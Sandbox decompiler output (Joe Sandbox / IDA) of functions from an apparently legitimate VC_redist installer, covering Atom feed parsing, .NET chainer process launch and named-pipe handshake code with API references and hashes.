                                                                          				_t139 = _a8;
                                                                          				_v16 = 0;
                                                                          				_v12 = 0;
                                                                          				_v8 = 0;
                                                                          				_t139[0xe] = _t130;
                                                                          				 *((intOrPtr*)( *_t130 + 4))(_t130);
                                                                          				_t140 = E000564F4( &(_t139[9]), _t130, L"author",  &(_t139[9]),  &(_t139[8]));
                                                                          				if(_t140 >= 0) {
                                                                          					_t140 = E0005658C( &(_t139[0xb]), _t130, L"category",  &(_t139[0xb]),  &(_t139[0xa]));
                                                                          					if(_t140 >= 0) {
                                                                          						_t140 = E000566BC( &(_t139[0xd]), _t130, L"link",  &(_t139[0xd]),  &(_t139[0xc]));
                                                                          						if(_t140 >= 0) {
                                                                          							_t137 =  &_v16;
                                                                          							_t140 =  *((intOrPtr*)( *_t130 + 0x30))(_t130,  &_v16);
                                                                          							if(_t140 >= 0) {
                                                                          								_t140 = E00053760( &_v16, _v16,  &_v12,  &_v8);
                                                                          								if(_t140 != 0) {
                                                                          									L42:
                                                                          									if(__eflags >= 0) {
                                                                          										_t99 =  *_t139;
                                                                          										__eflags = _t99;
                                                                          										if(_t99 == 0) {
                                                                          											L52:
                                                                          											_t100 = 0x8007000d;
                                                                          											_push(0x8007000d);
                                                                          											_push(0x311);
                                                                          											goto L53;
                                                                          										} else {
                                                                          											__eflags =  *_t99;
                                                                          											if( *_t99 == 0) {
                                                                          												goto L52;
                                                                          											} else {
                                                                          												_t102 = _t139[2];
                                                                          												__eflags = _t102;
                                                                          												if(_t102 == 0) {
                                                                          													L51:
                                                                          													_t100 = 0x8007000d;
                                                                          													_push(0x8007000d);
                                                                          													_push(0x316);
                                                                          													goto L53;
                                                                          												} else {
                                                                          													__eflags =  *_t102;
                                                                          													if( *_t102 == 0) {
                                                                          														goto L51;
                                                                          													} else {
                                                                          														__eflags = _t139[6];
                                                                          														if(_t139[6] != 0) {
                                                                          															L50:
                                                                          															_t140 = 0;
                                                                          														} else {
                                                                          															__eflags = _t139[5];
                                                                          															if(_t139[5] != 0) {
                                                                          																goto L50;
                                                                          															} else {
                                                                          																_t100 = 0x8007000d;
                                                                          																_push(0x8007000d);
                                                                          																_push(0x31b);
                                                                          																L53:
                                                                          																_t140 = _t100;
                                                                          																goto L54;
                                                                          															}
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									_a8 = _a8 & _t140;
                                                                          									_a4 = _a4 & _t140;
                                                                          									_t131 = CompareStringW;
                                                                          									_v20 = _t140;
                                                                          									L6:
                                                                          									while(1) {
                                                                          										if(CompareStringW(0x7f, 0, _v8, 0xffffffff, 0x73c78, 0xffffffff) != 2) {
                                                                          											_t104 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"summary", 0xffffffff);
                                                                          											__eflags = _t104 - 2;
                                                                          											if(_t104 != 2) {
                                                                          												_t105 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"title", 0xffffffff);
                                                                          												__eflags = _t105 - 2;
                                                                          												if(_t105 != 2) {
                                                                          													_t106 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"published", 0xffffffff);
                                                                          													__eflags = _t106 - 2;
                                                                          													if(_t106 != 2) {
                                                                          														_t107 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"updated", 0xffffffff);
                                                                          														__eflags = _t107 - 2;
                                                                          														if(_t107 != 2) {
                                                                          															_t108 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"author", 0xffffffff);
                                                                          															__eflags = _t108 - 2;
                                                                          															if(_t108 != 2) {
                                                                          																_t109 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"category", 0xffffffff);
                                                                          																__eflags = _t109 - 2;
                                                                          																if(_t109 != 2) {
                                                                          																	_t110 = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"content", 0xffffffff);
                                                                          																	__eflags = _t110 - 2;
                                                                          																	if(_t110 != 2) {
                                                                          																		__eflags = CompareStringW(0x7f, 0, _v8, 0xffffffff, L"link", 0xffffffff) - 2;
                                                                          																		if(__eflags != 0) {
                                                                          																			_t113 = E000579CC(_t131, __eflags, _v12,  &(_t139[0xf]));
                                                                          																			goto L33;
                                                                          																		} else {
                                                                          																			_t140 = E000576A1(_v12, _t139[0xd] + _t140);
                                                                          																			__eflags = _t140;
                                                                          																			if(_t140 >= 0) {
                                                                          																				_v20 = _v20 + 0x28;
                                                                          																				goto L34;
                                                                          																			}
                                                                          																		}
                                                                          																	} else {
                                                                          																		__eflags = _t139[7];
                                                                          																		if(_t139[7] != 0) {
                                                                          																			_t140 = 0x8000ffff;
                                                                          																		} else {
                                                                          																			_t100 = E000138D4(0x10, 1);
                                                                          																			_t139[7] = _t100;
                                                                          																			__eflags = _t100;
                                                                          																			if(_t100 == 0) {
                                                                          																				_t140 = 0x8007000e;
                                                                          																				_push(0x8007000e);
                                                                          																				_push(0x2f7);
                                                                          																				L54:
                                                                          																				_push("atomutil.cpp");
                                                                          																				E000137D3(_t100);
                                                                          																			} else {
                                                                          																				_t113 = E00056DA8(_v12, _t100);
                                                                          																				goto L33;
                                                                          																			}
                                                                          																		}
                                                                          																	}
                                                                          																} else {
                                                                          																	_t140 = E00056BF6(_v12, _t139[0xb] + _a8);
                                                                          																	__eflags = _t140;
                                                                          																	if(_t140 >= 0) {
                                                                          																		_a8 = _a8 + 0x10;
                                                                          																		goto L34;
                                                                          																	}
                                                                          																}
                                                                          															} else {
                                                                          																_t140 = E00056ACD(_v12, _t139[9] + _a4);
                                                                          																__eflags = _t140;
                                                                          																if(_t140 >= 0) {
                                                                          																	_a4 = _a4 + 0xc;
                                                                          																	goto L34;
                                                                          																}
                                                                          															}
                                                                          														} else {
                                                                          															_t128 =  &(_t139[5]);
                                                                          															goto L16;
                                                                          														}
                                                                          													} else {
                                                                          														_t128 =  &(_t139[3]);
                                                                          														L16:
                                                                          														_t113 = E00056754(_t137, _t128, _v12);
                                                                          														goto L33;
                                                                          													}
                                                                          												} else {
                                                                          													_t129 =  &(_t139[2]);
                                                                          													goto L11;
                                                                          												}
                                                                          											} else {
                                                                          												_t129 =  &(_t139[1]);
                                                                          												L11:
                                                                          												_push(_v12);
                                                                          												_push(_t129);
                                                                          												goto L8;
                                                                          											}
                                                                          										} else {
                                                                          											_push(_v12);
                                                                          											_push(_t139);
                                                                          											L8:
                                                                          											_t113 = E000567C4(_t137);
                                                                          											L33:
                                                                          											_t140 = _t113;
                                                                          											if(_t140 >= 0) {
                                                                          												L34:
                                                                          												if(_v8 != 0) {
                                                                          													__imp__#6(_v8);
                                                                          													_v8 = _v8 & 0x00000000;
                                                                          												}
                                                                          												_t137 = _v12;
                                                                          												if(_t137 != 0) {
                                                                          													 *((intOrPtr*)( *_t137 + 8))(_t137);
                                                                          													_v12 = _v12 & 0x00000000;
                                                                          												}
                                                                          												_t140 = E00053760(_t137, _v16,  &_v12,  &_v8);
                                                                          												if(_t140 != 0) {
                                                                          													goto L42;
                                                                          												} else {
                                                                          													_t140 = _v20;
                                                                          													continue;
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          										goto L55;
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          						}
                                                                          					}
                                                                          				}
                                                                          				L55:
                                                                          				__eflags = _v8;
                                                                          				if(_v8 != 0) {
                                                                          					__imp__#6(_v8);
                                                                          				}
                                                                          				_t133 = _v12;
                                                                          				__eflags = _t133;
                                                                          				if(_t133 != 0) {
                                                                          					 *((intOrPtr*)( *_t133 + 8))(_t133);
                                                                          				}
                                                                          				_t134 = _v16;
                                                                          				__eflags = _t134;
                                                                          				if(_t134 != 0) {
                                                                          					 *((intOrPtr*)( *_t134 + 8))(_t134);
                                                                          				}
                                                                          				return _t140;
                                                                          			}



























                                                                          0x00000000
                                                                          0x0005724a
                                                                          0x00057248
                                                                          0x0005720a
                                                                          0x00000000
                                                                          0x00057083
                                                                          0x0005706e
                                                                          0x00057059
                                                                          0x0005703f
                                                                          0x0005702b
                                                                          0x0005700e
                                                                          0x000572c0
                                                                          0x000572c0
                                                                          0x000572c4
                                                                          0x000572c9
                                                                          0x000572c9
                                                                          0x000572cf
                                                                          0x000572d2
                                                                          0x000572d4
                                                                          0x000572d9
                                                                          0x000572d9
                                                                          0x000572dc
                                                                          0x000572df
                                                                          0x000572e1
                                                                          0x000572e6
                                                                          0x000572e6
                                                                          0x000572f1

                                                                          APIs
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,00073C78,000000FF,?,?,?), ref: 0005707E
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,summary,000000FF), ref: 000570A3
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,title,000000FF), ref: 000570C3
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,published,000000FF), ref: 000570DF
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,updated,000000FF), ref: 00057107
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,author,000000FF), ref: 00057123
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,category,000000FF), ref: 0005715C
                                                                          • CompareStringW.KERNEL32(0000007F,00000000,?,000000FF,content,000000FF), ref: 00057195
                                                                            • Part of subcall function 00056BF6: SysFreeString.OLEAUT32(00000000), ref: 00056D2F
                                                                            • Part of subcall function 00056BF6: SysFreeString.OLEAUT32(00000000), ref: 00056D71
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 00057219
                                                                          • SysFreeString.OLEAUT32(00000000), ref: 000572C9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: String$Compare$Free
                                                                          • String ID: ($atomutil.cpp$author$cabinet.dll$category$clbcatq.dll$content$feclient.dll$link$msi.dll$published$summary$title$updated$version.dll
                                                                          • API String ID: 318886736-4294603148
                                                                          • Opcode ID: b46d8ac141756e1c132d1ad9202089e31ce785b8303362df4e597c98c0c4b9dd
                                                                          • Instruction ID: f61829705810cb4bd7dc614f5f03dae4d208cd56ff3ef3b2cff276c61ca4a4b1
                                                                          • Opcode Fuzzy Hash: b46d8ac141756e1c132d1ad9202089e31ce785b8303362df4e597c98c0c4b9dd
                                                                          • Instruction Fuzzy Hash: E5A1B131908616BBDB219B94DC41FAFB7B8AB04721F204354FE29AB1D1D731EE44EB91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 56%
                                                                          			E0003D22C(void* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, DWORD* _a20) {
                                                                          				signed int _v8;
                                                                          				char _v88;
                                                                          				char _v104;
                                                                          				char _v108;
                                                                          				char _v112;
                                                                          				char _v116;
                                                                          				struct _SECURITY_ATTRIBUTES* _v120;
                                                                          				signed short _v124;
                                                                          				intOrPtr _v128;
                                                                          				intOrPtr _v132;
                                                                          				struct _PROCESS_INFORMATION _v148;
                                                                          				intOrPtr _v152;
                                                                          				WCHAR* _v156;
                                                                          				DWORD* _v160;
                                                                          				intOrPtr _v164;
                                                                          				void* _v168;
                                                                          				signed int _v172;
                                                                          				signed short _v176;
                                                                          				signed int _v180;
                                                                          				char _v184;
                                                                          				struct _STARTUPINFOW _v252;
                                                                          				void* __ebx;
                                                                          				void* __edi;
                                                                          				void* __esi;
                                                                          				void* __ebp;
                                                                          				signed int _t73;
                                                                          				signed int _t84;
                                                                          				signed short _t86;
                                                                          				signed short _t89;
                                                                          				signed short _t100;
                                                                          				signed short _t104;
                                                                          				signed short _t105;
                                                                          				long _t119;
                                                                          				signed short _t123;
                                                                          				signed short _t124;
                                                                          				signed short _t127;
                                                                          				void* _t134;
                                                                          				DWORD* _t139;
                                                                          				signed short _t140;
                                                                          				void* _t143;
                                                                          				void* _t147;
                                                                          				signed short _t156;
                                                                          				signed short _t159;
                                                                          				signed short _t162;
                                                                          				signed int _t163;
                                                                          
                                                                          				_t143 = __edx;
                                                                          				_t73 =  *0x7a008; // 0xfbf51acb
                                                                          				_v8 = _t73 ^ _t163;
                                                                          				_v156 = _a4;
                                                                          				_v152 = _a8;
                                                                          				_v132 = _a12;
                                                                          				_v128 = _a16;
                                                                          				_v160 = _a20;
                                                                          				asm("stosd");
                                                                          				_t133 = 0;
                                                                          				_v116 = 0;
                                                                          				asm("stosd");
                                                                          				_v112 = 0;
                                                                          				_v120 = 0;
                                                                          				_v108 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				E0003F670( &_v104,  &_v252, 0, 0x44);
                                                                          				_v124 = 0;
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				asm("stosd");
                                                                          				_t84 =  &_v104;
                                                                          				__imp__UuidCreate(_t84);
                                                                          				if((_t84 | 0x00000001) >= 0) {
                                                                          					_t86 =  &_v104;
                                                                          					__imp__StringFromGUID2(_t86,  &_v88, 0x27);
                                                                          					__eflags = _t86;
                                                                          					if(_t86 != 0) {
                                                                          						_t89 = E00011F20( &_v112, L"NetFxSection.%ls",  &_v88);
                                                                          						__eflags = _t89;
                                                                          						if(_t89 >= 0) {
                                                                          							__eflags = E00011F20( &_v116, L"NetFxEvent.%ls",  &_v88);
                                                                          							if(__eflags >= 0) {
                                                                          								_t153 = E0003CC24(0, _t134, __eflags, _v112, _v116,  &_v108);
                                                                          								__eflags = _t153;
                                                                          								if(_t153 >= 0) {
                                                                          									_push(_v112);
                                                                          									_t153 = E00011F62( &_v120, L"%ls /pipe %ls", _v152);
                                                                          									__eflags = _t153;
                                                                          									if(_t153 >= 0) {
                                                                          										_t146 = _v156;
                                                                          										_v252.cb = 0x44;
                                                                          										_t100 = CreateProcessW(_v156, _v120, 0, 0, 0, 0x8000000, 0, 0,  &_v252,  &_v148);
                                                                          										__eflags = _t100;
                                                                          										if(_t100 != 0) {
                                                                          											_t133 = _v108;
                                                                          											_t146 = WaitForMultipleObjects;
                                                                          											_v168 = _v148.hProcess;
                                                                          											_v164 =  *((intOrPtr*)(_v108 + 4));
                                                                          											while(1) {
                                                                          												_t104 = WaitForMultipleObjects(2,  &_v168, 0, 0x64);
                                                                          												__eflags = _t104;
                                                                          												if(_t104 == 0) {
                                                                          													break;
                                                                          												}
                                                                          												__eflags = _t104 - 1;
                                                                          												if(_t104 != 1) {
                                                                          													__eflags = _t104 - 0xffffffff;
                                                                          													if(_t104 == 0xffffffff) {
                                                                          														_t105 = GetLastError();
                                                                          														__eflags = _t105;
                                                                          														_t156 =  <=  ? _t105 : _t105 & 0x0000ffff | 0x80070000;
                                                                          														__eflags = _t156;
                                                                          														_t153 =  >=  ? 0x80004005 : _t156;
                                                                          														E000137D3(0x80004005, "NetFxChainer.cpp", 0x19e, _t153);
                                                                          														_push("Failed to wait for netfx chainer process to complete");
                                                                          														L2:
                                                                          														_push(_t153);
                                                                          														E0005012F();
                                                                          														L29:
                                                                          														if(_v112 != 0) {
                                                                          															E000554EF(_v112);
                                                                          														}
                                                                          														if(_v116 != 0) {
                                                                          															E000554EF(_v116);
                                                                          														}
                                                                          														E00012793(_v120);
                                                                          														E0003CEF5(_t133, _t146, _t133);
                                                                          														_t147 = CloseHandle;
                                                                          														if(_v148.hThread != 0) {
                                                                          															CloseHandle(_v148.hThread);
                                                                          															_v148.hThread = _v148.hThread & 0x00000000;
                                                                          														}
                                                                          														if(_v148.hProcess != 0) {
                                                                          															CloseHandle(_v148.hProcess);
                                                                          														}
                                                                          														return E0003DE36(_t133, _v8 ^ _t163, _t143, _t147, _t153);
                                                                          													}
                                                                          													continue;
                                                                          												}
                                                                          												_t153 = E0003D12C(_t133, _v132, _v128);
                                                                          												__eflags = _t153;
                                                                          												if(_t153 >= 0) {
                                                                          													continue;
                                                                          												}
                                                                          												_push("Failed to process netfx chainer message.");
                                                                          												goto L2;
                                                                          											}
                                                                          											_t119 = E0003CFFC(_t133,  &_v124);
                                                                          											_t139 = _v160;
                                                                          											 *_t139 = _t119;
                                                                          											__eflags = _t119 - 0x8000000a;
                                                                          											if(_t119 != 0x8000000a) {
                                                                          												_t140 = _v124;
                                                                          												__eflags = _t140;
                                                                          												if(_t140 < 0) {
                                                                          													_t146 =  &_v184;
                                                                          													asm("stosd");
                                                                          													asm("stosd");
                                                                          													asm("stosd");
                                                                          													asm("stosd");
                                                                          													_v180 = _v180 & 0x00000000;
                                                                          													_t56 =  &_v172;
                                                                          													 *_t56 = _v172 & 0x00000000;
                                                                          													__eflags =  *_t56;
                                                                          													_v184 = 1;
                                                                          													_v176 = _t140;
                                                                          													_v132( &_v184, _v128);
                                                                          												}
                                                                          												goto L29;
                                                                          											}
                                                                          											_t123 = GetExitCodeProcess(_v148, _t139);
                                                                          											__eflags = _t123;
                                                                          											if(_t123 != 0) {
                                                                          												goto L29;
                                                                          											}
                                                                          											_t124 = GetLastError();
                                                                          											__eflags = _t124;
                                                                          											_t159 =  <=  ? _t124 : _t124 & 0x0000ffff | 0x80070000;
                                                                          											__eflags = _t159;
                                                                          											_t153 =  >=  ? 0x80004005 : _t159;
                                                                          											E000137D3(0x80004005, "NetFxChainer.cpp", 0x18a, _t153);
                                                                          											_push("Failed to get netfx return code.");
                                                                          											goto L2;
                                                                          										}
                                                                          										_t127 = GetLastError();
                                                                          										__eflags = _t127;
                                                                          										_t162 =  <=  ? _t127 : _t127 & 0x0000ffff | 0x80070000;
                                                                          										__eflags = _t162;
                                                                          										_t153 =  >=  ? 0x80004005 : _t162;
                                                                          										E000137D3(0x80004005, "NetFxChainer.cpp", 0x17a,  >=  ? 0x80004005 : _t162);
                                                                          										E0005012F( >=  ? 0x80004005 : _t162, "Failed to CreateProcess on path: %ls", _t146);
                                                                          										L12:
                                                                          										_t133 = _v108;
                                                                          										goto L29;
                                                                          									}
                                                                          									_push("Failed to allocate netfx chainer arguments.");
                                                                          									L11:
                                                                          									_push(_t153);
                                                                          									E0005012F();
                                                                          									goto L12;
                                                                          								}
                                                                          								_push("Failed to create netfx chainer.");
                                                                          								goto L11;
                                                                          							}
                                                                          							_push("Failed to allocate event name.");
                                                                          							goto L2;
                                                                          						}
                                                                          						_push("Failed to allocate section name.");
                                                                          						goto L2;
                                                                          					}
                                                                          					_t153 = 0x8007000e;
                                                                          					E000137D3(_t86, "NetFxChainer.cpp", 0x168, 0x8007000e);
                                                                          					_push("Failed to convert netfx chainer guid into string.");
                                                                          					goto L2;
                                                                          				}
                                                                          				_push("Failed to create netfx chainer guid.");
                                                                          				goto L2;
                                                                          			}


                                                                          APIs
                                                                          • UuidCreate.RPCRT4(?), ref: 0003D2A7
                                                                          • StringFromGUID2.OLE32(?,?,00000027), ref: 0003D2D0
                                                                          • CreateProcessW.KERNEL32 ref: 0003D3BC
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D3C6
                                                                          • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00000064,?,?,?,?), ref: 0003D45B
                                                                          • GetExitCodeProcess.KERNEL32 ref: 0003D485
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D493
                                                                          • GetLastError.KERNEL32(?,?,?,?), ref: 0003D4CB
                                                                            • Part of subcall function 0003D12C: WaitForSingleObject.KERNEL32(?,000000FF,746AF730,00000000,?,?,?,?,0003D439,?), ref: 0003D145
                                                                            • Part of subcall function 0003D12C: ReleaseMutex.KERNEL32(?,?,?,?,0003D439,?), ref: 0003D161
                                                                            • Part of subcall function 0003D12C: WaitForSingleObject.KERNEL32(?,000000FF), ref: 0003D1A4
                                                                            • Part of subcall function 0003D12C: ReleaseMutex.KERNEL32(?), ref: 0003D1BB
                                                                            • Part of subcall function 0003D12C: SetEvent.KERNEL32(?), ref: 0003D1C4
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0003D580
                                                                          • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?), ref: 0003D598
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000004.00000002.376975196.0000000000011000.00000020.00000001.01000000.00000008.sdmp, Offset: 00010000, based on PE: true
                                                                          • Associated: 00000004.00000002.376949992.0000000000010000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377084608.000000000005B000.00000002.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377148628.000000000007A000.00000004.00000001.01000000.00000008.sdmp
                                                                          • Associated: 00000004.00000002.377166369.000000000007E000.00000002.00000001.01000000.00000008.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_4_2_10000_VC_redist.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWait$CloseCreateHandleMutexObjectProcessReleaseSingle$CodeEventExitFromMultipleObjectsStringUuid
                                                                          • String ID: %ls /pipe %ls$@Met$D$Failed to CreateProcess on path: %ls$Failed to allocate event name.$Failed to allocate netfx chainer arguments.$Failed to allocate section name.$Failed to convert netfx chainer guid into string.$Failed to create netfx chainer guid.$Failed to create netfx chainer.$Failed to get netfx return code.$Failed to process netfx chainer message.$Failed to wait for netfx chainer process to complete$NetFxChainer.cpp$NetFxEvent.%ls$NetFxSection.%ls
                                                                          • API String ID: 2531618940-167293991
                                                                          • Opcode ID: 1e86c5fc7a7ce11f500bc6bc55fa964c2ac41724fb8a5cba7e851949be666f14
                                                                          • Instruction ID: 19a2ad27e8b5575ed2d81c7c7cca263b4d65fb81aa491246ec4084570cedcb50
                                                                          • Opcode Fuzzy Hash: 1e86c5fc7a7ce11f500bc6bc55fa964c2ac41724fb8a5cba7e851949be666f14
                                                                          • Instruction Fuzzy Hash: 0BA1A071E00728ABEB219BA5DC45BEEB7BCAF04300F10416AFA09FB152D7759E448F91
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          C-Code - Quality: 80%
                                                                          			E000252E3(long _a4) {
                                                                          				long _v8;
                                                                          				signed int _v12;
                                                                          				void _v16;
                                                                          				signed int _v20;
                                                                          				void* _v24;
                                                                          				void _v28;
                                                                          				void _v32;
                                                                          				intOrPtr _v36;
                                                                          				intOrPtr _v40;
                                                                          				WCHAR* _t40;
                                                                          				long _t43;
                                                                          				signed int _t44;
                                                                          				signed short _t48;
                                                                          				signed short _t56;
                                                                          				signed short _t62;
                                                                          				signed short _t67;
                                                                          				signed short _t73;
                                                                          				signed short _t79;
                                                                          				void* _t83;
                                                                          				long _t84;
                                                                          				signed int _t88;
                                                                          				void* _t109;
                                                                          
                                                                          				_t84 = _a4;
                                                                          				_t88 = 0;
                                                                          				_v40 =  *((intOrPtr*)(_t84 + 0x10));
                                                                          				_v36 =  *((intOrPtr*)(_t84 + 0x14));
                                                                          				_t40 =  *(_t84 + 4);
                                                                          				_v24 = _t40;
                                                                          				_v16 = lstrlenW(_t40) + _t41;
                                                                          				_t43 = GetCurrentProcessId();
                                                                          				_v32 = _v32 & 0;
                                                                          				_a4 = _a4 & 0;
                                                                          				_v28 = _t43;
                                                                          				_t44 = 0;
                                                                          				_v20 = 0;
                                                                          				while(1) {
                                                                          					L1:
                                                                          					_t83 =  *(_t109 + _t44 * 4 - 0x24);
                                                                          					if(_t83 == 0xffffffff) {
                                                                          						break;
                                                                          					}
                                                                          					_v8 = 1;
                                                                          					if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
                                                                          						_t48 = GetLastError();
                                                                          						_t91 =  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						_t88 =  >=  ? 0x80004005 :  <=  ? _t48 : _t48 & 0x0000ffff | 0x80070000;
                                                                          						E000137D3(0x80004005, "pipe.cpp", 0x1ce, _t88);
                                                                          						_push("Failed to set pipe to non-blocking.");
                                                                          						goto L28;
                                                                          					} else {
                                                                          						_v12 = _v12 & 0x00000000;
                                                                          						do {
                                                                          							if(ConnectNamedPipe(_t83, 0) != 0) {
                                                                          								goto L9;
                                                                          							} else {
                                                                          								_t52 = GetLastError();
                                                                          								if(_t52 == 0x217) {
                                                                          									_t88 = 0;
                                                                          									L11:
                                                                          									_v8 = _v8 & 0x00000000;
                                                                          									if(SetNamedPipeHandleState(_t83,  &_v8, 0, 0) == 0) {
                                                                          										_t56 = GetLastError();
                                                                          										_t94 =  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          										_t88 =  >=  ? 0x80004005 :  <=  ? _t56 : _t56 & 0x0000ffff | 0x80070000;
                                                                          										E000137D3(0x80004005, "pipe.cpp", 0x1f9, _t88);
                                                                          										_push("Failed to reset pipe to blocking.");
                                                                          										goto L28;
                                                                          									} else {
                                                                          										if(WriteFile(_t83,  &_v16, 4,  &_a4, 0) == 0) {
                                                                          											_t62 = GetLastError();
                                                                          											_t97 =  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          											_t88 =  >=  ? 0x80004005 :  <=  ? _t62 : _t62 & 0x0000ffff | 0x80070000;
                                                                          											E000137D3(0x80004005, "pipe.cpp", 0x1ff, _t88);
                                                                          											_push("Failed to write secret length to pipe.");
                                                                          											goto L28;
                                                                          										} else {
                                                                          											if(WriteFile(_t83, _v24, _v16,  &_a4, 0) == 0) {
                                                                          												_t67 = GetLastError();
                                                                          												_t100 =  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
                                                                          												_t88 =  >=  ? 0x80004005 :  <=  ? _t67 : _t67 & 0x0000ffff | 0x80070000;
                                                                          												E000137D3(0x80004005, "pipe.cpp", 0x204, _t88);
                                                                          												_push("Failed to write secret to pipe.");
                                                                          												goto L28;
                                                                          											} else {
                                                                          												if(WriteFile(_t83,  &_v28, 4,  &_a4, 0) == 0) {
                                                                          													_t73 = GetLastError();
                                                                          													_t103 =  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                          													_t88 =  >=  ? 0x80004005 :  <=  ? _t73 : _t73 & 0x0000ffff | 0x80070000;
                                                                          													E000137D3(0x80004005, "pipe.cpp", 0x209, _t88);
                                                                          													_push("Failed to write our process id to pipe.");
                                                                          													goto L28;
                                                                          												} else {
                                                                          													if(ReadFile(_t83,  &_v32, 4,  &_a4, 0) == 0) {
                                                                          														_t79 = GetLastError();
                                                                          														_t106 =  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          														_t88 =  >=  ? 0x80004005 :  <=  ? _t79 : _t79 & 0x0000ffff | 0x80070000;
                                                                          														E000137D3(0x80004005, "pipe.cpp", 0x20f, _t88);
                                                                          														_push("Failed to read ACK from pipe.");
                                                                          														goto L28;
                                                                          													} else {
                                                                          														_t44 = _v20 + 1;
                                                                          														_v20 = _t44;
                                                                          														if(_t44 < 2) {
                                                                          															goto L1;
                                                                          														} else {
                                                                          														}
                                                                          													}
                                                                          												}
                                                                          											}
                                                                          										}
                                                                          									}
                                                                          								} else {
                                                                          									if(_t52 != 0x218) {
                                                                          										_t88 =  <=  ? _t52 : _t52 & 0x0000ffff | 0x80070000;
                                                                          										break;
                                                                          									} else {
                                                                          										_t52 = _v12;
                                                                          										if(_t52 >= 0x708) {
                                                                          											_t88 = 0x800705b4;
                                                                          											L21:
                                                                          											E000137D3(_t52, "pipe.cpp", 0x1f3, _t88);
                                                                          											_push("Failed to wait for child to connect to pipe.");
                                                                          											L28:
                                                                          											_push(_t88);
                                                                          											E0005012F();
                                                                          										} else {
                                                                          											_t52 = _t52 + 1;
                                                                          											_t88 = 0x80070218;
                                                                          											_v12 = _t52;
                                                                          											Sleep(0x64);
                                                                          											goto L9;
                                                                          										}
                                                                          									}
                                                                          								}
                                                                          							}
                                                                          							goto L29;
                                                                          							L9:
                                                                          						} while (_t88 == 0x80070218);
                                                                          						if(_t88 < 0) {
                                                                          							goto L21;
                                                                          						} else {
                                                                          							goto L11;
                                                                          						}
                                                                          					}
                                                                          					break;
                                                                          				}
                                                                          				L29:
                                                                          				return _t88;
                                                                          			}

                                                                          APIs
                                                                          • lstrlenW.KERNEL32(?,?,00000000,?,0005B4F0,?,00000000,?,0001442A,?,0005B4F0), ref: 00025304
                                                                          • GetCurrentProcessId.KERNEL32(?,0001442A,?,0005B4F0), ref: 0002530F
                                                                          • SetNamedPipeHandleState.KERNEL32(?,000000FF,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025346
                                                                          • ConnectNamedPipe.KERNEL32(?,00000000,?,0001442A,?,0005B4F0), ref: 0002535B
                                                                          • GetLastError.KERNEL32(?,0001442A,?,0005B4F0), ref: 00025365
                                                                          • Sleep.KERNEL32(00000064,?,0001442A,?,0005B4F0), ref: 00025396
                                                                          • SetNamedPipeHandleState.KERNEL32(?,00000000,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253B9
                                                                          • WriteFile.KERNEL32(?,crypt32.dll,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253D4
                                                                          • WriteFile.KERNEL32(?,0001442A,0005B4F0,00000000,00000000,?,0001442A,?,0005B4F0), ref: 000253EF
                                                                          • WriteFile.KERNEL32(?,?,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 0002540A
                                                                          • ReadFile.KERNEL32(?,00000000,00000004,00000000,00000000,?,0001442A,?,0005B4F0), ref: 00025425
